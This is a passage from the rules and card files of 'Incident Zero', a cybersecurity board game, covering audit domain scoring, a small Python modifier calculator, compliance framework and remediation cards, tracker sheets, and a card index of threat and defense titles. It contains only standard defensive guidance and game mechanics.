Remediation Actions: - ✓ Vendor management program (SLAs, security requirements) - ✓ Cloud security posture management (CSPM tools) - ✓ Cloud IAM hardening (least privilege) - ✓ Regular vendor assessments

Impact if Failed (1-2 stars): - SCENARIO-03 (Supply Chain Compromise) becomes likely in Disaster Recovery - Vendor breach affects your customers - Liability disputes (who's responsible?) - Incident Response: -1 to WEB_EXPLOIT defenses (canonical modifier) - Disaster Recovery: -20 DR budget penalty (cloud provider recovery needed)


DOMAIN-06: Security Operations & Monitoring

Focus: How is security operationalized (day-to-day)?
Critical For: Sustained security posture
Regulatory References: Most frameworks mention continuous monitoring

What's Assessed: - Is there a dedicated security team (CISO, analysts)? - Are security meetings held regularly? - Is vulnerability scanning done regularly? - Are patches applied timely? - Is security training conducted?

Typical Findings: - Critical (1-2 star): No security team, no updates, no training - Major (2-3 star): Small security team, infrequent patching - Minor (3-4 star): Security team exists, good operations - Compliant (4-5 star): Mature security operations, continuous improvement

Real-World Question: "Is security a priority for the organization?" - Poor: No dedicated resources - Medium: Part-time effort - Strong: Dedicated team, empowered leadership

Audit Evidence: - Org chart (is CISO position filled?) - Security meeting minutes - Vulnerability scan reports - Patch management records - Training records

Compliance Standards: - Most frameworks require security leadership - NIST CSF: PR.IP-1 (Security policy established & communicated) - CIS Control 17: Incident Response Management (v8)

Findings Template:

FINDING: Security operations maturity inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Security team/training/patching] is [insufficient]
RECOMMENDATION: [Hire/train/increase resources] for [security function]
EFFORT: [Ongoing]
COST: [Varies]

Remediation Actions: - ✓ Hire CISO (if missing) - ✓ Establish security team - ✓ Regular vulnerability scanning - ✓ Patch management program - ✓ Security awareness training

Impact if Failed (1-2 stars): - Security functions are reactive (not proactive) - Incident Response: -1 to Investigation rolls (canonical modifier) - Disaster Recovery: -5 DR budget penalty (forensic investigation slow) - Vulnerabilities accumulate (PT-10 Zero-Day risk increases)


Audit Domain Summary

Domain     Focus                 Critical Finding   Remediation Effort   Compliance Impact
DOMAIN-01  Network Segmentation  Flat network       Moderate (2-4 wk)    Lateral movement prevented
DOMAIN-02  Access Control        No MFA             Low (2-4 wk)         Credential attacks harder
DOMAIN-03  Threat Detection      No SIEM            High (4-8 wk)        Breach detection enabled
DOMAIN-04  Backup & DR           No backups         Moderate (2-4 wk)    Ransomware resilience
DOMAIN-05  Vendor Risk           No assessment      Low (3-6 wk)         Supply chain risk managed
DOMAIN-06  Security Ops          No security team   High (ongoing)       Sustained security posture

Audit Scoring & Findings

Standard Audit Report Format

AUDIT REPORT - [Organization Name]
Audit Date: [Date]
Domains Assessed: 6
Overall Score: 2/6 PASS (stars are flavor: 1-2* = FAIL, 3*+ = PASS)

DOMAIN SCORES:
1. Network Segmentation: ⭐⭐ (2 stars) - FAIL
2. Access Control: ⭐⭐⭐ (3 stars) - PASS
3. Threat Detection: ⭐ (1 star) - FAIL (CRITICAL)
4. Backup & DR: ⭐⭐ (2 stars) - FAIL
5. Vendor Risk: ⭐⭐ (2 stars) - FAIL
6. Security Ops: ⭐⭐⭐⭐ (4 stars) - PASS

CRITICAL FINDINGS (must fix immediately):
- No SIEM or threat monitoring
- Network is completely flat (no segmentation)

MAJOR FINDINGS (fix within 30 days):
- No backup strategy
- Vendor security not assessed
- MFA not implemented

MINOR FINDINGS (fix within 90 days):
- Security training curriculum needs update

RECOMMENDATIONS:
1. Deploy SIEM immediately (critical)
2. Implement network segmentation
3. Establish backup program
4. Implement MFA
5. Develop vendor management program

Modifiers for Other Modules (generated from the canonical table in docs/rules/module-audit-compliance.md, v2.2)

Incident Response Modifiers

For each failed domain (FAIL = 1-2 stars): one -1 modifier.

Failed Domain            IR Modifier
DOMAIN-01 Segmentation   -1 to NETWORK defenses
DOMAIN-02 Identity       -1 to CREDENTIAL_ABUSE defenses
DOMAIN-03 Detection      -1 to Investigation rolls
DOMAIN-04 Backup         None (matters in DR)
DOMAIN-05 Vendor/Cloud   -1 to WEB_EXPLOIT defenses
DOMAIN-06 Security Ops   -1 to Investigation rolls

Example: if 3 domains fail, IR carries three separate -1 modifiers.

Disaster Recovery Modifiers

For each failed domain (FAIL = 1-2 stars): a penalty subtracted from the DR starting budget.

Failed Domain            DR Budget Penalty
DOMAIN-01 Segmentation   -10
DOMAIN-02 Identity       -15
DOMAIN-03 Detection      -10
DOMAIN-04 Backup         -25
DOMAIN-05 Vendor/Cloud   -20
DOMAIN-06 Security Ops   -5

Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.

Example (real budgets: DR starts at 50, IR at 100): if all 6 domains fail, the raw penalty is -85, capped at -30 — the team enters Disaster Recovery with 50 - 30 = 20 Budget.
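As an added worked example (not part of the print bundle), the Python below encodes the scoring and modifier rules stated above: star ratings map to PASS (3+) or FAIL (1-2), each failed domain contributes one IR modifier and one DR budget penalty from the canonical tables, and the total gap penalty is capped at -30 before it is subtracted from the DR starting budget of 50. The short domain labels and the report layout are assumptions; every number comes from the tables on this page.

```python
"""Audit outcome -> downstream modifiers, per the Incident Zero v2.2 tables.

Added example; not part of the print bundle. It encodes the rules above:
1-2 stars = FAIL, 3+ = PASS; each failed domain contributes one IR modifier
and one DR budget penalty; the total gap penalty is capped at -30.
"""
from dataclasses import dataclass, field

PASS_THRESHOLD = 3       # 3 stars or more is a PASS
PENALTY_CAP = -30        # v2.2 cap on the total gap penalty
DR_STARTING_BUDGET = 50  # Disaster Recovery starting budget

# (label, IR modifier or None, DR budget penalty), copied from the modifier
# tables above. Labels are shortened here (assumption); numbers are the page's.
DOMAINS = {
    "DOMAIN-01": ("Network Segmentation", "-1 to NETWORK defenses", -10),
    "DOMAIN-02": ("Access Control & Identity", "-1 to CREDENTIAL_ABUSE defenses", -15),
    "DOMAIN-03": ("Threat Detection & IR", "-1 to Investigation rolls", -10),
    "DOMAIN-04": ("Backup & DR", None, -25),  # no IR effect, matters in DR only
    "DOMAIN-05": ("Third-Party Risk & Cloud", "-1 to WEB_EXPLOIT defenses", -20),
    "DOMAIN-06": ("Security Operations", "-1 to Investigation rolls", -5),
}


@dataclass
class AuditOutcome:
    passed: list = field(default_factory=list)
    failed: list = field(default_factory=list)
    ir_modifiers: list = field(default_factory=list)  # one entry per failed domain
    raw_penalty: int = 0
    capped_penalty: int = 0

    @property
    def pass_count(self) -> int:
        return len(self.passed)

    def dr_budget(self, starting_budget: int = DR_STARTING_BUDGET) -> int:
        """Budget the team enters Disaster Recovery with (penalty is negative)."""
        return starting_budget + self.capped_penalty


def score_audit(stars: dict) -> AuditOutcome:
    """Map per-domain star ratings to PASS/FAIL and downstream modifiers.

    `stars` must rate every one of the six domains with an integer 1-5;
    a missing or out-of-range rating is a worksheet error and raises
    rather than silently scoring the domain.
    """
    missing = set(DOMAINS) - set(stars)
    if missing:
        raise ValueError(f"unscored domains: {sorted(missing)}")
    outcome = AuditOutcome()
    for domain_id, (_label, ir_mod, dr_penalty) in DOMAINS.items():
        rating = stars[domain_id]
        if not isinstance(rating, int) or not 1 <= rating <= 5:
            raise ValueError(f"{domain_id}: star rating must be 1-5, got {rating!r}")
        if rating >= PASS_THRESHOLD:
            outcome.passed.append(domain_id)
            continue
        outcome.failed.append(domain_id)
        if ir_mod is not None:
            outcome.ir_modifiers.append(f"{domain_id}: {ir_mod}")
        outcome.raw_penalty += dr_penalty
    # Penalties are negative, so "capped at -30" means the larger of the two.
    outcome.capped_penalty = max(outcome.raw_penalty, PENALTY_CAP)
    return outcome


def render_report(outcome: AuditOutcome) -> str:
    """Plain-text summary in the spirit of the Standard Audit Report above."""
    lines = [f"Overall Score: {outcome.pass_count}/6 PASS",
             f"Failed domains: {', '.join(outcome.failed) or 'none'}",
             "Incident Response modifiers:"]
    lines += [f"  - {m}" for m in outcome.ir_modifiers] or ["  - none"]
    lines.append(f"DR gap penalty: {outcome.raw_penalty} raw, "
                 f"{outcome.capped_penalty} after cap -> enter DR with "
                 f"{outcome.dr_budget()} Budget")
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed sample: the ratings from the Standard Audit Report above.
    sample = {"DOMAIN-01": 2, "DOMAIN-02": 3, "DOMAIN-03": 1,
              "DOMAIN-04": 2, "DOMAIN-05": 2, "DOMAIN-06": 4}
    print(render_report(score_audit(sample)))
    # The page's worst case: all six fail, -85 raw, capped to -30, DR starts at 20.
    print(render_report(score_audit({d: 1 for d in DOMAINS})))
```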


Gameplay Notes

Playing Audit Standalone

  1. Assess all 6 domains
  2. Score each domain (1-5 stars)
  3. Record findings
  4. Compile audit report
  5. Game ends: Audit complete, recommendations provided

Playing Audit as Module Lead-In

  1. Play Audit first (establish baseline)
  2. Get audit report with findings
  3. Play Incident Response (audit failures become modifiers)
  4. Play Disaster Recovery (audit failures increase costs)
  5. Narrative: Poor audit = harder subsequent modules

Audit Remediation Follow-Up (Optional)

  1. After audit report, teams can remediate findings
  2. Spend Budget to fix findings
  3. Re-assess domain (did remediation work?)
  4. Update modifiers for downstream modules

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by domain function:
     - Blue (Infrastructure): DOMAIN-01 (Segmentation)
     - Purple (Access): DOMAIN-02 (Identity)
     - Red (Detection): DOMAIN-03 (Detection)
     - Green (Resilience): DOMAIN-04 (Backup)
     - Orange (Supply Chain): DOMAIN-05 (Vendor)
     - Yellow (Operations): DOMAIN-06 (Ops)
  3. Include assessment rubric (1-5 star descriptions and the star → PASS/FAIL mapping)
  4. Include finding templates on back of card
  5. Cut along dotted lines
  6. Audit scoring reference card: see print pack (coming)

Audit & Compliance Module: Audit Domain Assessment Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/audit-compliance/expansion-deck/compliance-frameworks.md

Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion)

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Compliance Framework Cards extend the Audit & Compliance module with industry-specific and regulation-specific assessment frameworks beyond the generic 6-domain audit.


Compliance Framework Variants

Organizations must often comply with specific regulatory frameworks. Each framework has a slightly different focus and its own requirements.


NIST Cybersecurity Framework (5 cards)

Relevance: US Federal government, critical infrastructure, government contractors
Key Standard: NIST CSF (Cybersecurity Framework), 5 functions

FRAMEWORK-NIST-01: Identify Function

Framework: NIST CSF
Function: Identify (AM - Asset Management, RM - Risk Management)
Focus: Knowing what systems/data you have and what risks they face

Assessment Criteria: - Asset inventory (what systems exist?) - Data classification (what data is sensitive?) - Risk assessment (what could go wrong?) - Threat intelligence (what are realistic threats?)

Scoring (1-5 stars): - ⭐ (1): No asset inventory, no risk assessment - ⭐⭐ (2): Partial inventory, informal risk assessment - ⭐⭐⭐ (3): Complete inventory, documented risk assessment - ⭐⭐⭐⭐ (4): Inventory regularly updated, risk assessment reviewed annually - ⭐⭐⭐⭐⭐ (5): Real-time asset visibility, continuous risk assessment

Typical Findings: - Unknown systems (shadow IT) - Unclassified data (don't know what's sensitive) - Missing risk assessment - Risk assessment not updated

Remediation: - Discovery tools (find all systems) - Data classification policy - Annual risk assessment - Asset management system


FRAMEWORK-NIST-02: Protect Function

Framework: NIST CSF
Function: Protect (PR.AC - Identity Management & Access Control, PR.AT - Awareness & Training, PR.DS - Data Security, PR.IP - Information Protection Processes, PR.MA - Maintenance, PR.PT - Protective Technology)
Focus: Building security controls to prevent/slow attacks

Assessment Criteria: - Access controls (only authorized users) - Employee training (security awareness) - Data protection (encryption, classification) - Information protection (DLP, data loss prevention) - Business continuity (backup, disaster recovery)

Scoring (1-5 stars): - ⭐ (1): No controls - ⭐⭐ (2): Basic controls (passwords) - ⭐⭐⭐ (3): Good controls (MFA, encryption) - ⭐⭐⭐⭐ (4): Strong controls (defense-in-depth) - ⭐⭐⭐⭐⭐ (5): Excellent controls (comprehensive, tested)

Typical Findings: - Weak authentication (no MFA) - Poor training (phishing success rate >10%) - Unencrypted data - No backup strategy - Defense gaps

Remediation: - MFA deployment - Security training program - Encryption implementation - Backup/DR strategy - Penetration testing


FRAMEWORK-NIST-03: Detect Function

Framework: NIST CSF
Function: Detect (AE - Anomalies & Events, CM - Continuous Monitoring)
Focus: Detecting attacks as they happen

Assessment Criteria: - Log monitoring (are suspicious activities logged?) - Anomaly detection (is suspicious behavior caught?) - Continuous monitoring (24/7 surveillance) - Alert procedures (who responds to alerts?) - Threat intelligence integration (using threat data)

Scoring (1-5 stars): - ⭐ (1): No logging, no monitoring - ⭐⭐ (2): Logging exists, limited monitoring - ⭐⭐⭐ (3): SIEM deployed, some alerts - ⭐⭐⭐⭐ (4): SIEM with good rules, 24/7 monitoring - ⭐⭐⭐⭐⭐ (5): Mature SOC, threat intelligence integrated

Typical Findings: - No SIEM deployed - Alerts not reviewed - No 24/7 monitoring - Response time too slow - Threat intel not integrated

Remediation: - SIEM deployment - Alert rule tuning - SOC staffing (24/7 coverage) - Response procedures - Threat intel integration


FRAMEWORK-NIST-04: Respond Function

Framework: NIST CSF
Function: Respond (RS.RP - Response Planning, RS.CO - Communications, RS.AN - Analysis, RS.MI - Mitigation, RS.IM - Improvements)
Focus: Responding to breaches/attacks

Assessment Criteria: - Incident response plan (documented procedures) - Response team (trained, staffed) - Communication plan (who gets told when) - Investigation procedures (forensics) - Post-incident review (lessons learned)

Scoring (1-5 stars): - ⭐ (1): No incident response plan - ⭐⭐ (2): Plan exists, not tested - ⭐⭐⭐ (3): Plan exists, annual testing - ⭐⭐⭐⭐ (4): Plan regularly tested, team trained - ⭐⭐⭐⭐⭐ (5): Mature response, regular exercises, continuous improvement

Typical Findings: - No incident response plan - Response team not trained - No communication plan - Investigation procedures unclear - No post-incident reviews

Remediation: - Incident response plan development - Team training - Communication procedures - Tabletop exercises - Post-incident review process


FRAMEWORK-NIST-05: Recover Function

Framework: NIST CSF
Function: Recover (RC.RP - Recovery Planning, RC.IM - Improvements, RC.CO - Communications)
Focus: Recovering from breaches and improving for next time

Assessment Criteria: - Recovery plan (how to restore systems) - Recovery time objectives (RTO - how fast?) - Recovery point objectives (RPO - how much data loss?) - Backup verification (can you actually restore?) - Lessons learned process (improve after incident)

Scoring (1-5 stars): - ⭐ (1): No recovery plan, no backups - ⭐⭐ (2): Backup exists, recovery not tested - ⭐⭐⭐ (3): Recovery plan exists, tested annually - ⭐⭐⭐⭐ (4): Recovery plan regularly tested, RPO/RTO defined - ⭐⭐⭐⭐⭐ (5): Mature recovery, tested regularly, continuous improvement

Typical Findings: - No recovery plan - Backups untested (may not restore) - RTO/RPO not defined - Recovery team not trained - No lessons learned process

Remediation: - Recovery plan development - Backup testing (quarterly) - RTO/RPO definition - Recovery team training - Lessons learned process


CIS Controls (3 cards)

Relevance: General US/Canada, healthcare, financial, government
Key Standard: CIS Controls (18 prioritized security controls)

FRAMEWORK-CIS-01: Safeguards 1-6 (Foundations)

Focus: Basic security practices (asset management, access control, data protection, secure configuration)

Assessment Criteria: - Asset management (know what you have) - Access control (least privilege) - Data protection (encryption) - Secure configuration (harden systems) - Detection tools (SIEM, antivirus) - Training (security awareness)


FRAMEWORK-CIS-02: Safeguards 7-13 (Advanced Defenses)

Focus: Advanced controls (incident response, supply chain, defense tools)

Assessment Criteria: - Incident response plan - Supply chain risk - Vulnerability management - Application security - Remote services security - Testing & monitoring - Network segmentation


FRAMEWORK-CIS-03: Safeguards 14-18 (Operations & Governance)

Focus: Operational controls (reporting, awareness, training, testing)

Assessment Criteria: - Security awareness training - Incident reporting - Third-party risk management - Penetration testing - Secure development practices


PCI-DSS (3 cards)

Relevance: Any organization handling payment cards
Key Standard: PCI-DSS (Payment Card Industry Data Security Standard)

FRAMEWORK-PCI-01: Infrastructure Security (Requirements 1-4)

Focus: Network and system security for cardholder data

Assessment Criteria: - Firewall configuration - No default credentials - Cardholder data protection - Vulnerability scanning


FRAMEWORK-PCI-02: Access & Operations (Requirements 5-10)

Focus: Access control and operational procedures

Assessment Criteria: - Antivirus/malware protection - Secure system updates - Access control & authentication - Audit trails & logging


FRAMEWORK-PCI-03: Testing & Compliance (Requirements 11-12)

Focus: Testing, monitoring, and compliance management

Assessment Criteria: - Security testing (penetration testing, vulnerability scanning) - Monthly scanning - Annual penetration testing - Security policies - Training - Incident response procedures


Remediation Action Cards (8 cards)

Remediation Cards represent specific actions to address compliance findings. These can be used after an audit to remediate identified gaps.

Budget note (v2.2): these cards are the only place the Audit module's starting Budget (100, per core rules) is spent — the assessment itself costs nothing.

REMEDIATION-01: Implement MFA

Cost: 5 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium

What it does: - Deploy multi-factor authentication for all user access - Implement MFA for VPN, remote access, email, admin access - Select authentication method (authenticator app, hardware token, SMS)

Prerequisites: - Identity management system (Domain Controller, Azure AD) - User device (phone or security key) - Application/system support for MFA

Impact: - Reduces DOMAIN-02 (Access Control) findings - Makes credential attacks (T-03, T-06) harder - Improves Incident Response and Disaster Recovery modifiers


REMEDIATION-02: Deploy SIEM

Cost: 15 Budget · Timeline: 4-8 weeks · Difficulty: Medium

What it does: - Deploy Security Information & Event Management (SIEM) - Configure log collection from all systems - Create alert rules for suspicious activity - Implement 24/7 monitoring

Prerequisites: - Centralized logging infrastructure - SIEM software/service (Splunk, ELK, QRadar, Azure Sentinel) - Security personnel to manage SIEM

Impact: - Reduces DOMAIN-03 (Threat Detection) findings - Enables early breach detection - Improves Incident Response investigation - Provides audit trail for compliance


REMEDIATION-03: Implement Network Segmentation

Cost: 12 Budget · Timeline: 4-6 weeks · Difficulty: Medium-High

What it does: - Divide network into security zones (DMZ, internal, admin) - Deploy firewalls between zones - Configure firewall rules for inter-zone traffic - Implement VLANs and network isolation

Prerequisites: - Network switches/routers capable of VLAN support - Firewall(s) for inter-zone traffic - Network diagram and access requirements

Impact: - Reduces DOMAIN-01 (Network Segmentation) findings - Prevents lateral movement (T-04 becomes harder) - Improves Disaster Recovery (limits blast radius) - Foundational for zero-trust architecture


REMEDIATION-04: Backup & Disaster Recovery

Cost: 10 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium

What it does: - Implement 3-2-1 backup strategy (3 copies, 2 media, 1 offsite) - Configure automated backups - Test backup restoration (quarterly) - Document recovery procedures

Prerequisites: - Backup software/service - Off-site storage location - Testing schedule

Impact: - Reduces DOMAIN-04 (Backup & DR) findings - Enables ransomware recovery - Improves Disaster Recovery (reduces costs) - Supports compliance requirements


REMEDIATION-05: Security Training Program

Cost: 3 Budget · Timeline: 1-2 weeks (ongoing) · Difficulty: Low

What it does: - Develop security awareness training curriculum - Conduct initial training for all employees - Implement phishing simulations - Quarterly refresher training

Prerequisites: - Training development (internal or vendor) - Management buy-in (release time for employees)

Impact: - Reduces DOMAIN-06 (Security Ops) findings - Reduces phishing success rate - Improves overall security culture - Compliance requirement (most frameworks)


REMEDIATION-06: Vendor Security Assessment

Cost: 5 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium

What it does: - Develop vendor security questionnaire - Send questionnaires to key vendors - Review vendor security controls - Document vendor risk assessment - Establish SLAs with security requirements

Prerequisites: - Vendor list and criticality assessment - Security questionnaire template - Document review process

Impact: - Reduces DOMAIN-05 (Third-Party Risk) findings - Identifies supply chain risks - Prevents SCENARIO-03 (Supply Chain Compromise) - Compliance requirement (GDPR, etc.)


REMEDIATION-07: Vulnerability Management Program

Cost: 8 Budget · Timeline: 3-4 weeks · Difficulty: Medium

What it does: - Deploy vulnerability scanning tools - Establish patching procedures - Configure patch management automation - Document vulnerability remediation process

Prerequisites: - Vulnerability scanner (Nessus, Qualys, OpenVAS) - Patch management tools or procedures - Prioritization process (critical vs. non-critical)

Impact: - Reduces multiple audit findings - Prevents PT-05 (Privilege Escalation via unpatched kernel) - Improves overall security posture


REMEDIATION-08: Incident Response Plan & Team

Cost: 12 Budget · Timeline: 4-6 weeks (plus ongoing) · Difficulty: Medium-High

What it does: - Develop incident response plan (procedures, contacts, escalation) - Establish incident response team - Conduct tabletop exercises - Implement communication procedures

Prerequisites: - Team designation (CISO, security analysts, IT, legal, PR) - Plan documentation - Training and exercises

Impact: - Reduces DOMAIN-03 (Threat Detection) and DOMAIN-06 (Security Ops) findings - Enables faster response to Incident Response module - Improves Disaster Recovery effectiveness - Compliance requirement (nearly universal)


Using Compliance Frameworks in Gameplay

Standalone Compliance Assessment

  1. Choose one framework (e.g., NIST CSF, CIS Controls, PCI-DSS)
  2. Assess each requirement
  3. Score and document findings
  4. Develop remediation roadmap
  5. Game ends: Compliance report delivered

Framework-Specific Play

Remediation Roadmap

  1. After audit, teams identify high-priority findings
  2. Allocate budget to remediation actions
  3. Spend Budget to fix findings
  4. Re-assess after remediation
  5. Track compliance journey

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Framework color-coding:
     - Blue (NIST): FRAMEWORK-NIST-01 to FRAMEWORK-NIST-05
     - Orange (CIS): FRAMEWORK-CIS-01 to FRAMEWORK-CIS-03
     - Red (PCI): FRAMEWORK-PCI-01 to FRAMEWORK-PCI-03
     - Green (Remediation): REMEDIATION-01 to REMEDIATION-08
  3. Include assessment rubric (1-5 stars) on each framework card
  4. Include cost/timeline/difficulty on remediation cards
  5. Cut along dotted lines

Possible Expansion: Additional Frameworks


Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/print-templates/tracker-sheets.md

Tracker Sheets (Print & Play)

Version: 2.2 - Playtest Edition

Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.


Universal Tracker Sheet (all modules)

Turn Track

Cross off as each turn ends. Circle your turn limit before starting.

 1   2   3   4   5   6   7   8   9   10   11   12   13   14   15   16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]  [ ]

Budget Track

Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.

150 145 140 135 130 125 120 115 110 105 100  95  90  85  80  75
 70  65  60  55  50  45  40  35  30  25  20  15  10   5   0

Reputation / Score Track (0-100)

100  95  90  85  80  75  70  65  60  55  50  45  40  35  30  25  20  15  10  5  0

Uncontained Threats (Incident Response)

 0   1   2   3   4   5
[ ] [ ] [ ] [ ] [ ] [ ]      Penalty at start of turn: -5 Budget each

Forensics Module Sheet — Progress Meters

Advance each meter per card effects. Victory thresholds marked ▲.

ATTRIBUTION      0   10   20   30   40   50   60   70   80   90▲  100
TIMELINE         0   10   20   30   40   50   60   70   80▲  90   100
ATTACK CHAIN     0   10   20   30   40   50   60   70   80▲  90   100
CHAIN OF CUSTODY 0   10   20   30   40   50   60   70▲  80   90   100

Victory check (end of game): - V1 Full Attribution: Attribution ≥90 AND Timeline ≥80 - V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70 - V3 Partial Findings: any two meters ≥70

Investigation in flight: ____ (results arrive Turn _)

Evidence collected (✓ = Analyzed, one Analyze per card):

Evidence card              Documented? (+5% CoC)   Analyzed?
_________________________  [ ]                     [ ]
_________________________  [ ]                     [ ]
_________________________  [ ]                     [ ]
_________________________  [ ]                     [ ]

Disaster Recovery Module Sheet

Crisis Progress Tracks

INVESTIGATION   0   10   20   30   40   50   60   70   80   90   100
REMEDIATION     0   10   20   30   40   50   60   70   80   90   100
COMMUNICATION   0   10   20   30   40   50   60   70   80   90   100

Stakeholder Trust (0-100%; any stakeholder at 0% = company collapses)

Stakeholder          100   80    60    40    20 (critical)   0 (LOSS)
Customers            [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Employees            [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Regulators           [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Board / Investors    [ ]   [ ]   [ ]   [ ]   [ ]             [ ]
Media / Public       [ ]   [ ]   [ ]   [ ]   [ ]             [ ]

Deadline Timeline (mark scheduled events at setup)

Turn              1     2     3     4     5     6     7     8
Scheduled event   ___   ___   ___   ___   ___   ___   ___   ___
Deadline          ___   ___   ___   ___   ___   ___   ___   ___

Deadlines to mark: Customers notified (recommended) · Regulator penalties begin · GDPR 72h — regulators notified

Multi-turn action in flight: ____ (completes Turn _)


Audit & Compliance Module Sheet — Scoring Worksheet

#   Domain                   Stars (1-5)   PASS (3★+) / FAIL (1-2★)   Key gap found
1   Network Segmentation     ___           ________                   ________________________
2   Identity & Access        ___           ________                   ________________________
3   Detection & Monitoring   ___           ________                   ________________________
4   Backup & Recovery        ___           ________                   ________________________
5   Cloud Security           ___           ________                   ________________________
6   Security Operations      ___           ________                   ________________________

Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).


Network Building Module Sheet — Score Sheet

| Category | Points | Notes |
|---|---|---|
| Requirements met | | per requirement card |
| Security coverage | | per rules scoring table |
| Capability coverage | | per rules scoring table |
| Budget management | | per rules scoring table |
| TOTAL | | |

Components placed:

| Component | Cost | Capacity used / total |
|---|---|---|
| | | |
| | | |
| | | |

Budget remaining: ___ / starting ___

cards/CARD_REFERENCE.md

Incident Zero: Card Reference Index

Version 2.2 - Playtest Edition

Complete index of all cards across all six modules. This index is generated from the card files themselves — the card files under each module folder are the canonical source of truth. If this index ever disagrees with a card file, the card file wins.

Total: 247 cards across 6 modules (the 24-card shared Defense deck is counted once).

Incident Response Module

Module total: 63 cards (12 core threats + 24 shared defenses + 8 expansion threats + 19 expansion defenses).

| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Core Threats | threat-defense-cards.md | T-01 – T-12 | 12 | Attack chain steps for the Threat Orchestrator, organized by kill chain phase |
| Core Defenses (shared) | threat-defense-cards.md | D-01 – D-24 | 24 | Shared with Hardening — see Shared Defense Deck |
| Expansion Threats | advanced-threats.md | T-13 – T-20 | 8 | Supply chain, insider, IoT, cloud, DNS tunneling, and physical attacks |
| Expansion Defenses | advanced-defenses.md | D-25 – D-43 | 19 | Whitelisting, behavioral analytics, container/cloud security, playbooks, backup/DR |

Core Threat Deck (T-01 – T-12)

| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-01 | Phishing Campaign | INITIAL COMPROMISE | SOCIAL ENGINEERING |
| T-02 | Watering Hole Attack | INITIAL COMPROMISE | WEB EXPLOIT |
| T-03 | Compromised Credentials | INITIAL COMPROMISE | CREDENTIAL ABUSE |
| T-04 | Lateral Movement via SMB | PIVOT & ESCALATE | NETWORK |
| T-05 | Privilege Escalation via Kernel Exploit | PIVOT & ESCALATE | MALWARE |
| T-06 | Mimikatz Credential Dumping | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-07 | Scheduled Task Persistence | PERSISTENCE | MALWARE |
| T-08 | Registry Run Key Persistence | PERSISTENCE | MALWARE |
| T-09 | Beaconing to C2 Server | C2 & EXFIL | NETWORK |
| T-10 | SQL Database Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-11 | Ransomware Payload Deployment | C2 & EXFIL | MALWARE |
| T-12 | Browser Extension Backdoor | C2 & EXFIL | DATA EXFIL |

By step: INITIAL COMPROMISE 3 (T-01–03) · PIVOT & ESCALATE 3 (T-04–06) · PERSISTENCE 2 (T-07–08) · C2 & EXFIL 4 (T-09–12).

Expansion Threat Deck (T-13 – T-20)

| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-13 | Compromised Software Vendor Update | INITIAL COMPROMISE | MALWARE |
| T-14 | Malicious Third-Party Library Injection | INITIAL COMPROMISE | MALWARE |
| T-15 | Malicious Insider Data Theft | C2 & EXFIL | DATA EXFIL |
| T-16 | Disgruntled Employee Sabotage | PIVOT & ESCALATE | MALWARE |
| T-17 | Compromised IoT Device as Pivot Point | INITIAL COMPROMISE | NETWORK |
| T-18 | Cloud API Token Theft & Abuse | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-19 | DNS Tunneling Data Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-20 | Physical Access + Badge Cloning Attack | INITIAL COMPROMISE | CREDENTIAL ABUSE |

Expansion Defense Deck (D-25 – D-43)

Distribution: 4 BASIC (10 Budget) / 8 ADVANCED (15 Budget) / 7 ELITE (25 Budget).

| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-25 | Application Whitelisting | BASIC (10) | MALWARE |
| D-26 | Advanced Application Control with AI | ADVANCED (15) | MALWARE |
| D-27 | Living-Off-The-Land Blocker | ELITE (25) | MALWARE |
| D-28 | Baseline Behavior Learning System | ADVANCED (15) | NETWORK |
| D-29 | Process Behavior Analysis | ADVANCED (15) | MALWARE |
| D-30 | Machine Learning Anomaly Detection | ELITE (25) | MALWARE |
| D-31 | Container Image Scanning | BASIC (10) | MALWARE |
| D-32 | Container Runtime Protection | ADVANCED (15) | MALWARE |
| D-33 | Kubernetes Network Policy & RBAC | ELITE (25) | NETWORK |
| D-34 | Cloud Configuration Auditing | BASIC (10) | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing | ADVANCED (15) | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail | ELITE (25) | DATA EXFIL |
| D-37 | Playbook: Ransomware Response | ADVANCED (15) | MALWARE |
| D-38 | Playbook: Credential Compromise Response | ADVANCED (15) | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response | ELITE (25) | DATA EXFIL |
| D-40 | Playbook: Supply Chain Breach Response | ELITE (25) | WEB EXPLOIT |
| D-41 | Backup Strategy - 3-2-1 Rule | BASIC (10) | MALWARE |
| D-42 | Immutable Backup Storage | ADVANCED (15) | MALWARE |
| D-43 | Disaster Recovery Plan & Testing | ELITE (25) | MALWARE |

Shared Defense Deck (IR + Hardening)

24 cards (D-01 – D-24), indexed once. The same deck appears in full in both module folders (threat-defense-cards.md under Incident Response and defense-cards.md under Hardening).

